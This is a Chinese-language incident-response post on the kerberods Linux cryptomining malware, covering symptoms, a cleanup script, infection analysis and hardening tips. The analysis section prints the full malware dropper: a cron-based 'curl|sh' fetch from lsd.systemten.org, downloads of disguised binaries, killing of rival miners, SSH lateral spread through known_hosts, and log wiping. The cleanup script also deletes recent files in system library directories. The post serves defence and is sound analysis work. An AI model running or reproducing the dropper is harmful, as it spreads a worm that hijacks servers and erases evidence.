Linux服務器感染kerberods病毒 | 挖礦病毒查殺及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh）

概要：

一、症狀及表現

二、查殺方法

三、病毒分析

四、安全防護

五、參考文章

 

---

 

一、症狀及表現

1、CPU使用率異常，top命令顯示CPU統計數數據均為0，利用busybox 查看CPU占用率之后，發現CPU被大量占用；

*注：ls top ps等命令已經被病毒的動態鏈接庫劫持，無法正常使用，大家需要下載busybox,具體的安裝和下載步驟參見參考文章（https://blog.csdn.net/u010457406/article/details/89328869）。

2、crontab 定時任務異常，存在以下內容；

3、后期病毒變異，劫持sshd，導致遠程登陸失敗，偶爾還會跳出定時任務失敗，收到新郵件等問題；

 4、 存在異常文件、異常進程以及異常開機項

 

---

 

二、查殺方法

1、斷網，停止定時任務服務；

2、查殺病毒主程序，以及保護病毒的其他進程；

3、恢復被劫持的動態鏈接庫和開機服務；

4、重啟服務器和服務；

附查殺腳本(根據情況修改)

（腳本參考（https://blog.csdn.net/u010457406/article/details/89328869））

#!/bin/bash
#可以重復執行幾次，防止互相拉起導致刪除失敗

function installBusyBox(){
    #參考第一段
    busybox|grep BusyBox |grep v
}

function banHosts(){
    #刪除免密認證，防止繼續通過ssh進行擴散，后續需自行恢復，可不執行
    busybox echo "" > /root/.ssh/authorized_keys
    busybox echo "" > /root/.ssh/id_rsa
    busybox echo "" > /root/.ssh/id_rsa.pub
    busybox echo "" > /root/.ssh/known_hosts
    #busybox echo "" > /root/.ssh/auth
    #iptables -I INPUT -p tcp --dport 445 -j DROP
    busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com\n0.0.0.0 systemten.org" >> /etc/hosts
}


function fixCron(){
    #修復crontab
    busybox chattr -i  /etc/cron.d/root  2>/dev/null
    busybox rm -f /etc/cron.d/root
    busybox chattr -i /var/spool/cron/root  2>/dev/null
    busybox rm -f /var/spool/cron/root
    busybox chattr -i /var/spool/cron/tomcat  2>/dev/null
    busybox rm -f /var/spool/cron/tomcat
    busybox chattr -i /var/spool/cron/crontabs/root  2>/dev/null
    busybox rm -f /var/spool/cron/crontabs/root
    busybox rm -rf /var/spool/cron/tmp.*
    busybox rm -rf /var/spool/cron/crontabs
    busybox touch /var/spool/cron/root
    busybox chattr +i /var/spool/cron/root
}

function killProcess(){
    #修復異常進程
    #busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    #busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    #busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    #busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    #busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/kauditds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox rm -f /tmp/khugepageds
    busybox rm -f /tmp/migrationds 
    busybox rm -f /tmp/sshd 
    busybox rm -f /tmp/kauditds
    busybox rm -f /tmp/migrationds
    busybox rm -f /usr/sbin/sshd
    busybox rm -f /usr/sbin/kerberods
    busybox rm -f /usr/sbin/kthrotlds
    busybox rm -f /usr/sbin/kintegrityds
    busybox rm -f /usr/sbin/kpsmouseds
    busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf
}


function clearLib(){
    #修復動態庫
    busybox chattr -i /etc/ld.so.preload
    busybox rm -f /etc/ld.so.preload
    busybox rm -f /usr/local/lib/libcryptod.so
    busybox rm -f /usr/local/lib/libcset.so
    busybox chattr -i /etc/ld.so.preload 2>/dev/null
    busybox chattr -i /usr/local/lib/libcryptod.so  2>/dev/null
    busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null
    busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf
    busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf
    busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf
    busybox rm -f /etc/ld.so.cache
    busybox rm -f /etc/ld.so.preload
    busybox rm -f /usr/local/lib/libcryptod.so
    busybox rm -f /usr/local/lib/libcset.so
    busybox rm -rf /usr/local/lib/libdevmapped.so
    busybox rm -rf /usr/local/lib/libpamcd.so 
    busybox rm -rf /usr/local/lib/libdevmapped.so
    busybox touch /etc/ld.so.preload
    busybox chattr +i /etc/ld.so.preload
    ldconfig
}

function clearInit(){
    #修復異常開機項
    #chkconfig netdns off 2>/dev/null
    #chkconfig –del netdns 2>/dev/null
    #systemctl disable netdns 2>/dev/null
    busybox rm -f /etc/rc.d/init.d/kerberods
    busybox rm -f /etc/init.d/netdns
    busybox rm -f /etc/rc.d/init.d/kthrotlds
    busybox rm -f /etc/rc.d/init.d/kpsmouseds
    busybox rm -f /etc/rc.d/init.d/kintegrityds
    busybox rm -f /etc/rc3.d/S99netdns
    #chkconfig watchdogs off 2>/dev/null
    #chkconfig --del watchdogs 2>/dev/null
    #chkconfig --del kworker 2>/dev/null
    #chkconfig --del netdns 2>/dev/null
}

function recoverOk(){
    service crond start
    busybox sleep 3
    busybox chattr -i /var/spool/cron/root
    # 將殺毒進程加入到定時任務中，多次殺毒
    echo "*/10 * * * * /root/kerberods_kill.sh" | crontab -
    # 恢復被劫持的sshd 服務
    #busybox cp ~/sshd_new /usr/sbin/sshd 
    #service sshd restart 
    echo "OK,BETTER REBOOT YOUR DEVICE"
}

#先停止crontab服務
echo "1| stop crondtab service!"
service crond stop
#防止病毒繼續擴散
echo "2| banHosts!"
banHosts
#清除lib劫持
echo "3| clearLib!"
clearLib
#修復crontab
echo "4| fixCron!"
fixCron
#清理病毒進程
echo "5| killProcess!"
killProcess
#刪除異常開機項
echo "6| clearInit! "
clearInit
#重啟服務和系統
echo "7| recover!"
recoverOk

查殺完成以后重啟服務器，發現過段時間，登陸主機，無論本地還是ssh遠程登陸，依然會有病毒進程被拉起，觀察top里面的進程，並用pstree 回溯進程之間的關系，發現每次用戶登陸就會有病毒進程被拉起，懷疑登陸時加載文件存在問題，逐個排查下列文件：

• /etc/profile，
• ~/.profile，
• ~/.bash_login，
• ~/.bash_profile，
• ~/.bashrc，
• /etc/bashrc；

最后終於發現/etc/bashrc 文件被加入了一些似曾相識的語句

 

刪除並且再次查殺病毒（重復之前查殺步驟），重啟服務器，觀察一段時間后不再有病毒程序被拉起，至此病毒被查殺完全。

 

---

 

三、病毒分析

1、感染路徑

• 攻擊者通過網絡進入第一台被感染的機器(redis未認證漏洞、ssh密碼暴力破解登錄等)。
• 第一台感染的機器會讀取known_hosts文件，遍歷ssh登錄，如果是做了免密登錄認證，則將直接進行橫向傳播。

2、病毒主要模塊

• 主惡意程序：kerberods
• 惡意Hook庫：libcryptod.so libcryptod.c
• 挖礦程序：khugepageds
• 惡意腳本文件：netdns (用作kerberods的啟停等管理)
• 惡意程序：sshd （劫持sshd服務，每次登陸均可拉起病毒進程）

3、執行順序

 

　　① 執行惡意腳本下載命令

② 主進程操作

1> 添加至開機啟動，以及/etc/bashrc 
2> 生成了sshd文件 劫持sshd服務
3> 將netdns文件設置為開機啟動
4> 編譯libcryptod.c為/usr/local/lib/libcryptod.so
5> 預加載動態鏈接庫，惡意hook關鍵系統操作函數
6> 修改/etc/cron.d/root文件，增加定時任務
7> 拉起khugepageds挖礦進程

附病毒惡意進程代碼

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

mkdir -p /tmp
chmod 1777 /tmp

echo "* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab -

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
    chattr -i sshd
    rm -rf sshd
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod +x sshd
    else
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod +x sshd
    fi
        $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
fi

for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
        fi
    fi
done

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#

 

---

 

四、安全防護

1. SSH
   ① 謹慎做免密登錄
   ② 盡量不使用默認的22端口
   ③ 增強root密碼強度
2. Redis
   ① 增加授權認證(requirepass參數)
   ② 盡量使用docker版本(docker pull redis)
   ③ 隱藏重要的命令

五、參考文章

• kerberods挖礦病毒查殺及分析(crontab 挖礦 curl -fsSL https://pastebin.com/raw）

• 記服務器中招挖礦病毒解決過程

• Rocke挖礦軟件新變種瞄准Jenkins漏洞

• 挖礦病毒kerberods的分析和應急響應過程

• Watchdogs利用Redis實施大規模挖礦，常見數據庫蠕蟲如何破？